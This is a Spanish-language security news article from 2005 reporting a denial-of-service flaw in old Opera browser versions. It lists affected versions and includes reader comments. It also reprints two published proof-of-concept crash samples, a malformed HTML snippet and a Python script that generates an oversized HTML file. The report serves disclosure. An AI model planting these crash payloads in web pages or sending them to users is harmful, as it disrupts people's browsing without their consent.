Otras noticias
Más noticias
En el foro
Ir al foro de Seguridad
VULNERABILIDADES

Denegación de servicio en el navegador Opera

Opera Web Browser es propenso a múltiples vulnerabilidades que pueden resultar en un fallo del programa. El problema se produce cuando el navegador intenta interpretar cierto contenido HTML creado maliciosamente.

24 Oct 2005 | VS ANTIVIRUS
N

o se ha comprobado que esta vulnerabilidad pueda ser utilizada para la ejecución remota de código.

Han sido publicados los siguientes ejemplos, que insertados en una página HTML serían capaces de hacer fallar a este navegador.

El primer ejemplo es un código HTML mal formado:

<html><head></head><body><bdo>A<bgsound style=
"margin:-99;">A<hr>A<hr></body></html>

El segundo ejemplo es el código de un script para Python, el conocido lenguaje interpretado, el cuál genera en este caso, contenido HTML:

html = open("opera.html", "w")
html.write("<html> ")
html.write("<head></head> ")
buff1 = 'A'*32499
html.write("<bodyA> "+buff1+" ")
buff2 = 'B'*153
html.write("<u "+buff2+"> ")
html.write("</body></html>")
html.close()


Productos vulnerables:

- Opera Web Browser 8.5
- Opera Web Browser 8.0.2
- Opera Web Browser 8.0.1
- Opera Web Browser 8.0 
- Opera Web Browser 7.54 
- Opera Web Browser 7.53 
- Opera Web Browser 7.52 
- Opera Web Browser 7.51 
- Opera Web Browser 7.50 
- Opera Web Browser 7.23 
- Opera Web Browser 7.22 
- Opera Web Browser 7.21 
- Opera Web Browser 7.20 Beta 1 build 2981
- Opera Web Browser 7.20 
- Opera Web Browser 7.11.j
- Opera Web Browser 7.11.b
- Opera Web Browser 7.11 
- Opera Web Browser 7.10 
- Opera Web Browser 7.0 win32 Beta 2
- Opera Web Browser 7.0 win32 Beta 1
- Opera Web Browser 7.0 win32
- Opera Web Browser 7.0.3 win32
- Opera Web Browser 7.0.2 win32
- Opera Web Browser 7.0.1 win32
- Opera Web Browser 6.10 linux
- Opera Web Browser 6.0.5 win32
- Opera Web Browser 6.0.4 win32
- Opera Web Browser 6.0.3 win32
- Opera Web Browser 6.0.3 linux
- Opera Web Browser 6.0.2 win32
- Opera Web Browser 6.0.2 linux
- Opera Web Browser 6.0.1 win32
- Opera Web Browser 6.0.1 linux
- Opera Web Browser 6.0.1 
- Opera Web Browser 6.0 win32
- Opera Web Browser 6.0.6
- Opera Web Browser 6.0.6 win32
- Opera Web Browser 6.0 
- Opera Web Browser 5.12 win32
- Opera Web Browser 5.12 
- Opera Web Browser 5.1.1 win32
- Opera Web Browser 5.1.0 win32
- Opera Web Browser 5.0.2 win32
- Opera Web Browser 5.0 Mac
- Opera Web Browser 5.0 Linux
- Opera Web Browser 8 Beta 3.


Relacionados:

Opera Web Browser Multiple Malformed HTML Parsing Denial Of Service Vulnerabilities
http://www.securityfocus.com/bid/15124/info

Boletín

Si quieres recibir cada semana las noticias más interesantes suscríbete a nuestro boletín.

Comentarios
LaFlecha.net no se hace responsable del contenido de los comentarios publicados.
#1 | 24 Oct 2005, 18:46
Taleb

Sus datos están mal.

La versión 8.5 no es afectada por la vulnerabilidad.

#2 | 24 Oct 2005, 23:25
guille

Confirmo el primer fallo en 8.5 y 9tp1 bajo winxp. Pero no es una vulnerabilidad, es un bug.

#3 | 26 Oct 2005, 15:22
Vlady

Yo creo que se considera una vulnerabilidad, desde que este bug permite una denegación de servicio o ejecución remota de código, pudiendo esta ser explotada por alguna persona maliciosa.

Entérate de cuándo hay nuevos comentarios

No se permitirán los comentarios que :
- puedan resultar ofensivos o injuriosos
- incluyan insultos, alusiones sexuales innecesarias y palabras soeces o vulgares
- apoyen la pedofilia, el terrorismo o la xenofobia

Autor
Comentario
BBCode (Ayuda): [b], [i], [quote], [code]
Publicidad
Ahora en LaFlecha puedes encontrar cursos y másters